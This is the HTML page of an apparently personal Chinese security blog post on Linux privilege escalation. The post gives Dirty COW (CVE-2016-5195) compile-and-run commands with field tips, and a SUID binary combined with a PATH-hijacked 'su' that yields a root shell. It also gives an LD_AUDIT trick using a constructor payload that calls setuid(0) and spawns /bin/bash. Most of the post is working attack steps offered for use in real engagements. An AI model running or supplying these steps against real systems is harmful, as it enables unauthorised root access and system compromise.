<!DOCTYPE html>
<html lang="zh-CN">
  <head>
  <meta charset="UTF-8">
  <meta 
    name="viewport"
    content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
  <meta 
    http-equiv="X-UA-Compatible" 
    content="ie=edge">
  <meta 
    name="theme-color" 
    content="#fff" 
    id="theme-color">
  <meta 
    name="description" 
    content="Chen">
  <link 
    rel="icon" 
    href="/img/favicon.png">
  <title>Linux提权</title>
  
    
      <meta 
        property="og:title" 
        content="Linux提权">
    
    
      <meta 
        property="og:url" 
        content="https://www.zerochen.top/article/Linux%E6%8F%90%E6%9D%83/index.html">
    
    
      <meta 
        property="og:img" 
        content="/img/logo.png">
    
    
    
      <meta 
        property="og:type" 
        content="article">
      <meta 
        property="og:article:published_time" 
        content="2021-08-28">
      <meta 
        property="og:article:modified_time" 
        content="2021-08-28">
      <meta 
        property="og:article:author" 
        content="沉墨">
      
        
          <meta 
            property="og:article:tag" 
            content="提权">
        
      
    
  
  <script>
    function loadScript(url, cb) {
      var script = document.createElement('script');
      script.src = url;
      if (cb) script.onload = cb;
      script.async = true;
      document.body.appendChild(script);
    }
    function loadCSS(href, data, attr) {
      var sheet = document.createElement('link');
      sheet.ref = 'stylesheet';
      sheet.href = href;
      sheet.dataset[data] = attr;
      document.head.appendChild(sheet);
    }
    function changeCSS(cssFile, data, attr) {
      var oldlink = document.querySelector(data);
      var newlink = document.createElement("link");
      newlink.setAttribute("rel", "stylesheet");
      newlink.setAttribute("href", cssFile);
      newlink.dataset.prism = attr;
      document.head.replaceChild(newlink, oldlink);
    }
  </script>
  
    
  
  <script>
    // control reverse button
    var reverseDarkList = {
      dark: 'light',
      light: 'dark'
    };
    var themeColor = {
      dark: '#1c1c1e',
      light: '#fff'
    }
    // get the data of css prefers-color-scheme
    var getCssMediaQuery = function() {
      return window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
    };
    // reverse current darkmode setting function
    var reverseDarkModeSetting = function() {
      var setting = localStorage.getItem('user-color-scheme');
      if(reverseDarkList[setting]) {
        setting = reverseDarkList[setting];
      } else if(setting === null) {
        setting = reverseDarkList[getCssMediaQuery()];
      } else {
        return;
      }
      localStorage.setItem('user-color-scheme', setting);
      return setting;
    };
    // apply current darkmode setting
  </script>
  
    <script>
      var setDarkmode = function(mode) {
      var setting = mode || localStorage.getItem('user-color-scheme');
      if(setting === getCssMediaQuery()) {
        document.documentElement.removeAttribute('data-user-color-scheme');
        localStorage.removeItem('user-color-scheme');
        document.getElementById('theme-color').content = themeColor[setting];
        document.getElementById('theme-color').dataset.mode = setting;
      } else if(reverseDarkList[setting]) {
        document.documentElement.setAttribute('data-user-color-scheme', setting);
        document.getElementById('theme-color').content = themeColor[setting];
        document.getElementById('theme-color').dataset.mode = setting;
      } else {
        document.documentElement.removeAttribute('data-user-color-scheme');
        localStorage.removeItem('user-color-scheme');
        document.getElementById('theme-color').content = themeColor[getCssMediaQuery()];
        document.getElementById('theme-color').dataset.mode = getCssMediaQuery();
      }
    };
    setDarkmode();
    </script>
  
  
  <link rel="preload" href="//at.alicdn.com/t/font_1946621_i1kgafibvw.css" as="style" >
  <link rel="preload" href="//at.alicdn.com/t/font_1952792_89b4ac4k4up.css" as="style" >
  
  
    <link rel="preload" href="/js/lib/lightbox/baguetteBox.min.js" as="script">
    <link rel="preload" href="/js/lib/lightbox/baguetteBox.min.css" as="style" >
  
  
    <link rel="preload" href="/js/lib/lozad.min.js" as="script">
  
  
  
  
  
    
    <link rel="prefetch" href="//unpkg.com/valine/dist/Valine.min.js" as="script">
  
  
  
  <link rel="stylesheet" href="/css/main.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1946621_i1kgafibvw.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1952792_89b4ac4k4up.css">
  
    <link rel="stylesheet" href="/js/lib/lightbox/baguetteBox.min.css">
  
  
<meta name="generator" content="Hexo 5.4.0"></head>

  <body>
    <div class="wrapper">
       
      <nav class="navbar">
  <div class="navbar-logo">
    <span class="navbar-logo-main">
      
        <img 
          class="navbar-logo-img" 
          src="/img/favicon.png" 
          alt="blog logo">
      
      <span class="navbar-logo-dsc">沉墨的小小技术圈</span>
    </span>
  </div>
  <div class="navbar-menu">
    
      <a 
        href="/" 
        class="navbar-menu-item">
        
          首页
        
      </a>
    
      <a 
        href="/archives" 
        class="navbar-menu-item">
        
          归档
        
      </a>
    
      <a 
        href="/tags" 
        class="navbar-menu-item">
        
          标签
        
      </a>
    
      <a 
        href="/categories" 
        class="navbar-menu-item">
        
          分类
        
      </a>
    
      <a 
        href="/about" 
        class="navbar-menu-item">
        
          关于
        
      </a>
    
      <a 
        href="/links" 
        class="navbar-menu-item">
        
          友链
        
      </a>
    
    <a 
      class="navbar-menu-item darknavbar" 
      id="dark">
      <i class="iconfont icon-weather"></i>
    </a>
    <a 
      class="navbar-menu-item searchnavbar" 
      id="search">
      <i 
        class="iconfont icon-search" 
        style="font-size: 1.2rem; font-weight: 400;">
      </i>
    </a>
  </div>
</nav> 
      
      <div 
        id="local-search" 
        style="display: none">
        <input
          class="navbar-menu-item"
          id="search-input"
          placeholder="请输入搜索内容..." />
        <div id="search-content"></div>
      </div>
      
      <div class="section-wrap">
        <div class="container">
          <div class="columns">
            <main class="main-column">
<article class="card card-content">
  <header>
    <h1 class="post-title">
      Linux提权
    </h1>
  </header>
  <div class="post-meta post-show-meta">
    <time datetime="2021-08-28T12:28:05.000Z">
      <i 
        class="iconfont icon-calendar" 
        style="margin-right: 2px;">
      </i>
      <span>2021-08-28</span>
    </time>
    
      <span class="dot"></span>
      
        <a 
          href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" 
          class="post-meta-link">
          内网渗透
        </a>
      
    
    
      <span class="dot"></span>
      <span>768 字</span>
    
  </div>
  
    <div 
      class="post-meta post-show-meta" 
      style="margin-top: -10px;">
      <div style="display: flex; align-items: center;">
        <i 
          class="iconfont icon-biaoqian" 
          style="margin-right: 2px; font-size: 1.15rem;">
        </i>
        
          
          <a 
            href="/tags/%E6%8F%90%E6%9D%83/" 
            class="post-meta-link">
            提权
          </a>
        
      </div>
    </div>
  
  </header>
  <div 
    id="section" 
    class="post-content">
    <p>基础漏洞提权、数据库提权、SUID提权</p>
<p>常用命令</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>uname  -a</td>
<td>显示所有可用系统信息</td>
</tr>
<tr>
<td>uname  -r</td>
<td>内核版本</td>
</tr>
<tr>
<td>uname  -m</td>
<td>查看系统架构（32/64）</td>
</tr>
<tr>
<td>cat  /proc/version</td>
<td>内核信息</td>
</tr>
<tr>
<td>cat  /etc/issue</td>
<td>发行版本信息</td>
</tr>
<tr>
<td>id</td>
<td>当前用户信息</td>
</tr>
</tbody></table>
<p><a target="_blank" rel="noopener" href="https://github.com/SecWiki/Linux-kernel-exploits">https://github.com/SecWiki/Linux-kernel-exploits</a></p>
<p>脏牛提权：</p>
<p>漏洞范围：</p>
<p>Linux kernel &gt;= 2.6.22（2007年发行，到2016年10月18日才修复）</p>
<p>（CVE-2016-5195 Dirty cow -&gt; centos6、Ubuntu14、16）</p>
<p>C版本</p>
<p>Ubuntu系统会导致系统重启</p>
<p>若是直接执行导致服务器无响应，需要进入/tmp下修改passwd.bak文件后缀，则可重新运行</p>
<p>实战中，需要将原始备份文件（/tmp/passwd.bak）移动至/etc/passwd，其余的备份文件可删除</p>
<p>编译</p>
<pre class="highlight"><span class="line">gcc -pthread dirty.c -o dirty -lcrypt</span><br></pre>

<p>运行</p>
<pre class="highlight"><span class="line">./dirty _passwd</span><br></pre>

<p>C++版本（解决Ubuntu系统崩溃问题）</p>
<pre class="highlight"><span class="line">g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil</span><br><span class="line"></span><br><span class="line">./dcow -s</span><br></pre>

<p>可复刻虚拟机，然后在本地虚拟机编译g++之后再上传靶机</p>
<p>用法</p>
<table>
<thead>
<tr>
<th>语句</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>gcc  exp.c -o exp</td>
<td>gcc编译</td>
</tr>
<tr>
<td>./exp</td>
<td>运行</td>
</tr>
</tbody></table>
<p>注：需要在交互式终端运行</p>
<p>其他常用脚本：</p>
<p>CVE-2018-1000001(glibc)</p>
<p>Mysql的UDF提权</p>
<p>前提：</p>
<p>mysql的root账户</p>
<p>mysqld以操作系统的root权限启动</p>
<p>secure_file_priv=’’</p>
<p>提权过程</p>
<p>同Windows的Mysql的UDF提权</p>
<p>详见udf.txt</p>
<p>导出路径固定/usr/lib64/mysql/plugin/x.so</p>
<p>SUID提权</p>
<p>作用于二进制可执行程序上，当执行这个程序时会临时切换身份为文件所有者身份</p>
<p>设置方法</p>
<p>权限设定方法：</p>
<p>1、 字母表示法：</p>
<p>chmod u+s FILE … à 添加SUID权限</p>
<p>chmod u-s FILE … à 删除SUID权限</p>
<p>2、数字表示法：</p>
<p>chmod 4755 FILE à 添加SUID权限到二进制程序文件 ** 在普通三位数字权限之前，用4代表添加到SUID位</p>
<p>chmod 0xxx FILE à 可以删除文件的SUID</p>
<p>注：s表示有效的suid权限，S表示没有执行权限，suid权限无效</p>
<p>提权步骤</p>
<p>1、编写C文件</p>
<pre class="highlight"><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line"></span><br><span class="line">setuid(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">setgid(<span class="number">0</span>); # 两句设置以root权限运行</span><br><span class="line"></span><br><span class="line">system(<span class="string">&quot;su root&quot;</span>); # 切换到root用户</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre>

<p>2、编译</p>
<p>gcc demo.c -o demo</p>
<p>3、添加suid权限</p>
<p>chmod +s demo</p>
<p>4、伪装su文件。因为 demo.c 中有“su root”这个系统命令，要让这个su命令执行的不是系统自带的su脚本</p>
<pre class="highlight"><span class="line">echo &quot;/bin/bash&quot; &gt; su</span><br><span class="line"></span><br><span class="line">chmod 777 su</span><br></pre>



<p>5、添加环境变量，让系统执行/tmp下的su文件</p>
<pre class="highlight"><span class="line">export PATH=/tmp:$PATH</span><br></pre>

<p>6、在普通用户下运行demo程序，切换到root账户，提权成功</p>
<p>其他提权方式</p>
<p>亲测可用（环境centos7）</p>
<pre class="highlight"><span class="line">登录普通用户</span><br><span class="line"></span><br><span class="line">mkdir /tmp/exploit                //创建目录</span><br><span class="line"></span><br><span class="line">ln -s /bin/ping /tmp/exploit/target        //创建ping链接</span><br><span class="line"></span><br><span class="line"><span class="built_in">exec</span> 3&lt; /tmp/exploit/target            //设置文件夹描述为3</span><br><span class="line"></span><br><span class="line">rm -rf /tmp/exploit/            //删除文件夹</span><br><span class="line"></span><br><span class="line">ls -l /proc/$$/fd/3                //复制$$值</span><br><span class="line"></span><br><span class="line">vim payload.c                //创建配置文件</span><br><span class="line"></span><br><span class="line">void __attribute__((constructor)) init()           //在配置文件加入如下的内容</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">setuid(0);</span><br><span class="line"></span><br><span class="line">system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">:wq</span><br><span class="line"></span><br><span class="line">gcc -w -fPIC -shared -o /tmp/exploit payload.c    //需要安装gcc</span><br><span class="line"></span><br><span class="line">ls -l /tmp/exploit</span><br><span class="line"></span><br><span class="line">LD_AUDIT=<span class="string">&quot;<span class="variable">$ORIGIN</span>&quot;</span> <span class="built_in">exec</span> /proc/复制$$值/fd/3</span><br></pre>


  </div>
  <div>
    
      <div 
        class="post-note note-warning copyright" 
        style="margin-top: 42px">
        <p>
          <span style="font-weight: bold;">作者：</span><a 
            target="_blank" 
            rel="nofollow noopener noreferrer" 
            href="/about">
            沉墨
          </a>
        </p>
        <p>
          <span style="font-weight: bold;">文章链接：</span><a 
            target="_blank" 
            rel="nofollow noopener noreferrer" 
            href="https://www.zerochen.top/article/Linux%E6%8F%90%E6%9D%83/">
            https://www.zerochen.top/article/Linux%E6%8F%90%E6%9D%83/
          </a>
        </p>
        <p><span style="font-weight: bold;">版权声明：</span>转载请注明出处！</p>
      </div>
    
  </div>
</article>
<div class="nav">
  
    <div class="nav-item-prev">
      <a 
        href="/article/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" 
        class="nav-link">
        <i class="iconfont icon-left nav-prev-icon"></i>
        <div>
          <div class="nav-label">上一篇</div>
          
            <div class="nav-title">权限维持 </div>
          
        </div>
      </a>
    </div>
  
  
    <div class="nav-item-next">
      <a 
        href="/article/Windows%E6%8F%90%E6%9D%83/" 
        class="nav-link">
        <div>
          <div class="nav-label">下一篇</div>
          
            <div class="nav-title">Windows提权 </div>
          
        </div>
        <i class="iconfont icon-right nav-next-icon"></i>
      </a>
    </div>
  
</div>

  <div 
    class="card card-content comment-card" 
    style="margin-top: 16px;">
    <div class="comment-card-title">评论</div>
    
  <div id="vcomments"></div>
  
  <script>
    loadScript("//unpkg.com/valine/dist/Valine.min.js");
    var oldLoadVa = window.onload;
    window.onload = function () {
      oldLoadVa && oldLoadVa();
      new Valine({
        el: '#vcomments',
        appId: '2ShT4MB47jbSbE00Kn5TgK8j-gzGzoHsz',
        appKey: 'eC6yijqvttNWfHdJogIgmhA4',
        placeholder: 'Just go go',
        path: window.location.pathname,
        avatar: 'mp',
        meta: ["nick","mail","link"],
        pageSize: '10',
        lang: '',
        visitor: 'false',
        highlight: true,
        recordIP: false,
        
        
        
        enableQQ: 'false',
        requiredFields: [],
      });
    };
  </script>

  </div>

<div 
  class="card card-content toc-card" 
  id="mobiletoc">
  <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>

</div></main>
            <aside class="left-column">
              
              <div class="card card-author">
                
  <img 
    src="/img/logo.png" 
    class="author-img" 
    alt="author avatar">

<p class="author-name">沉墨</p>
<p class="author-description">谨言多思，野蛮生长</p>
<div class="author-message">
  <a 
    class="author-posts-count" 
    href="/archives">
    <span>53</span>
    <span>文章</span>
  </a>
  <a 
    class="author-categories-count" 
    href="/categories">
    <span>11</span>
    <span>分类</span>
  </a>
  <a 
    class="author-tags-count" 
    href="/tags">
    <span>52</span>
    <span>标签</span>
  </a>
</div>

              </div>
               <div class="sticky-tablet">
  
  
    <article class="display-when-two-columns spacer">
      <div class="card card-content toc-card">
        <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>

      </div>
    </article>
  
  
  <article class="card card-content categories-widget">
    <div class="categories-card">
  <div class="categories-header">
    <i 
      class="iconfont icon-fenlei" 
      style="padding-right: 2px;">
    </i>分类
  </div>
  <div class="categories-list">
    
      <a href="/categories/Web%E6%B8%97%E9%80%8F/">
        <div class="categories-list-item">
          Web渗透
          <span class="categories-list-item-badge">20</span>
        </div>
      </a>
    
      <a href="/categories/%E7%BC%96%E7%A8%8B%E5%9F%BA%E7%A1%80/">
        <div class="categories-list-item">
          编程基础
          <span class="categories-list-item-badge">3</span>
        </div>
      </a>
    
      <a href="/categories/%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80/">
        <div class="categories-list-item">
          网络基础
          <span class="categories-list-item-badge">2</span>
        </div>
      </a>
    
      <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
        <div class="categories-list-item">
          漏洞复现
          <span class="categories-list-item-badge">5</span>
        </div>
      </a>
    
      <a href="/categories/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/">
        <div class="categories-list-item">
          环境搭建
          <span class="categories-list-item-badge">7</span>
        </div>
      </a>
    
      <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
        <div class="categories-list-item">
          内网渗透
          <span class="categories-list-item-badge">7</span>
        </div>
      </a>
    
      <a href="/categories/Linux/">
        <div class="categories-list-item">
          Linux
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/Python/">
        <div class="categories-list-item">
          Python
          <span class="categories-list-item-badge">5</span>
        </div>
      </a>
    
      <a href="/categories/Windows/">
        <div class="categories-list-item">
          Windows
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/%E5%AE%89%E6%9C%8D/">
        <div class="categories-list-item">
          安服
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
      <a href="/categories/%E9%99%84%E5%8A%A0%E6%8A%80%E8%83%BD/">
        <div class="categories-list-item">
          附加技能
          <span class="categories-list-item-badge">1</span>
        </div>
      </a>
    
  </div>
</div>
  </article>
  
  <article class="card card-content tags-widget">
    <div class="tags-card">
  <div class="tags-header">
    <i 
      class="iconfont icon-biaoqian" 
      style="padding-right: 2px;">
    </i>热门标签
  </div>
  <div class="tags-list">
    
      <a 
        href="/tags/Access/" 
        title="Access">
        <div class="tags-list-item">Access</div>
      </a>
    
      <a 
        href="/tags/BurpSuite%E4%BB%A3%E7%90%86/" 
        title="BurpSuite代理">
        <div class="tags-list-item">BurpSuite代理</div>
      </a>
    
      <a 
        href="/tags/%E7%BB%95%E8%BF%87Token%E7%88%86%E7%A0%B4/" 
        title="绕过Token爆破">
        <div class="tags-list-item">绕过Token爆破</div>
      </a>
    
      <a 
        href="/tags/CSRF/" 
        title="CSRF">
        <div class="tags-list-item">CSRF</div>
      </a>
    
      <a 
        href="/tags/HTML/" 
        title="HTML">
        <div class="tags-list-item">HTML</div>
      </a>
    
      <a 
        href="/tags/CSS/" 
        title="CSS">
        <div class="tags-list-item">CSS</div>
      </a>
    
      <a 
        href="/tags/HTTP/" 
        title="HTTP">
        <div class="tags-list-item">HTTP</div>
      </a>
    
      <a 
        href="/tags/JBoss/" 
        title="JBoss">
        <div class="tags-list-item">JBoss</div>
      </a>
    
      <a 
        href="/tags/JavaScript/" 
        title="JavaScript">
        <div class="tags-list-item">JavaScript</div>
      </a>
    
      <a 
        href="/tags/Java/" 
        title="Java">
        <div class="tags-list-item">Java</div>
      </a>
    
      <a 
        href="/tags/%E6%8F%90%E6%9D%83/" 
        title="提权">
        <div class="tags-list-item">提权</div>
      </a>
    
      <a 
        href="/tags/%E9%9A%8F%E8%AE%B0/" 
        title="随记">
        <div class="tags-list-item">随记</div>
      </a>
    
      <a 
        href="/tags/MS17-010/" 
        title="MS17-010">
        <div class="tags-list-item">MS17-010</div>
      </a>
    
      <a 
        href="/tags/MSSQL/" 
        title="MSSQL">
        <div class="tags-list-item">MSSQL</div>
      </a>
    
      <a 
        href="/tags/mysql/" 
        title="mysql">
        <div class="tags-list-item">mysql</div>
      </a>
    
      <a 
        href="/tags/Nosql/" 
        title="Nosql">
        <div class="tags-list-item">Nosql</div>
      </a>
    
  </div>
</div>
  </article>
  
  
</div>
            </aside>
            <aside class="right-column">
              <div class="sticky-widescreen">
  
  
    <article class="card card-content toc-card">
      <div class="toc-header">
  <i 
    class="iconfont icon-menu" 
    style="padding-right: 2px;">
  </i>目录
</div>

    </article>
  
  
  <article class="card card-content">
    <div class="recent-posts-card">
  <div class="recent-posts-header">
    <i 
      class="iconfont icon-wenzhang_huaban" 
      style="padding-right: 2px;">
    </i>最近文章
  </div>
  <div class="recent-posts-list">
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2021-09-12</div>
        <a href="/article/msf%E5%92%8Cstowaway%E4%BB%A3%E7%90%86/"><div class="recent-posts-item-content">msf和stowaway代理</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2021-09-04</div>
        <a href="/article/%E8%BE%B9%E7%95%8C%E4%BB%A3%E7%90%86%E5%8F%8A%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/"><div class="recent-posts-item-content">边界代理及端口转发</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2021-09-04</div>
        <a href="/article/hash%E4%BC%A0%E9%80%92/"><div class="recent-posts-item-content">hash传递</div></a>
      </div>
    
      <div class="recent-posts-item">
        <div class="recent-posts-item-title">2021-09-04</div>
        <a href="/article/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96/"><div class="recent-posts-item-content">Windows密码抓取</div></a>
      </div>
    
  </div>
</div>
  </article>
  
  
</div>
            </aside>
          </div>
        </div>
      </div>
    </div>
     
    <footer class="footer">
  <div class="footer-container">
    <div>
      <div class="footer-dsc">
        <span>
          Copyright ©
          
            2020 -
          
          2021
        </span>
        &nbsp;
        <a 
          href="/" 
          class="footer-link">
          沉墨的小小技术圈
        </a>
      </div>
    </div>

    
    
    
      <div class="BbeiAn-info">
        <a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">皖ICP备2021010523号-1 </a>
      </div>
      
        <div class="BbeiAn-info">
          <span style="padding-left: 25px;background: url(/img/beian.png) no-repeat left center"></span>
          <a target="_blank" rel="noopener" href="http://www.beian.gov.cn/portal/recordQuery ">皖公网安备 34012202341035号
          </a>
          <br />
        </div>
      
    
    
      <div class="footer-dsc">
        
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
        
          <span>&nbsp;|&nbsp;</span>
        
        
          本站总访客数<span id="busuanzi_value_site_uv"></span>次
        
      </div>
      
    
</footer> 
    
  <a 
    role="button" 
    id="scrollbutton" 
    class="basebutton" 
    aria-label="回到顶部">
    <i class="iconfont icon-arrowleft button-icon"></i>
  </a>

<a 
  role="button" 
  id="menubutton" 
  class="basebutton">
  <i class="iconfont icon-menu button-icon"></i>
</a>
<a 
  role="button" 
  id="popbutton" 
  class="basebutton" 
  aria-label="控制中心">
  <i class="iconfont icon-expand button-icon"></i>
</a>
<a 
  role="button" 
  id="darkbutton" 
  class="basebutton darkwidget" 
  aria-label="夜色模式">
  <i class="iconfont icon-weather button-icon"></i>
</a>
<a 
  role="button" 
  id="searchbutton" 
  class="basebutton searchwidget" 
  aria-label="搜索">
  <i class="iconfont icon-search button-icon"></i>
</a> 
     
     
     
      <script>
  var addImgLayout = function () {
    var img = document.querySelectorAll('.post-content img')
    var i
    for (i = 0; i < img.length; i++) {
      var wrapper = document.createElement('a')
      wrapper.setAttribute('href', img[i].getAttribute('data-src'))
      wrapper.setAttribute('aria-label', 'illustration')
      wrapper.style.cssText =
        'width: 100%; display: flex; justify-content: center;'
      if (img[i].alt) wrapper.dataset.caption = img[i].alt
      wrapper.dataset.nolink = true
      img[i].before(wrapper)
      wrapper.append(img[i])
      var divWrap = document.createElement('div')
      divWrap.classList.add('gallery')
      wrapper.before(divWrap)
      divWrap.append(wrapper)
    }
    baguetteBox.run('.gallery')
  }
</script>
<script>
  loadScript(
    "/js/lib/lightbox/baguetteBox.min.js",
    addImgLayout
  )
</script>
 
     
     
    <script src="/js/main.js"></script> 
    
      <script> 
        loadScript('/js/lib/busuanzi.min.js') 
      </script>
     
    
      <script>
        var addLazyload = function () {
          var observer = lozad('.lozad', {
            load: function (el) {
              el.srcset = el.getAttribute('data-src')
            },
            loaded: function (el) {
              el.classList.add('loaded')
            },
          })
          observer.observe()
        }
      </script>
      <script>
        loadScript('/js/lib/lozad.min.js', addLazyload)
      </script>
     
    
    
      <script>
        setTimeout(() => {localSearch("search.json")}, 0)
      </script>
    
  </body>
</html>
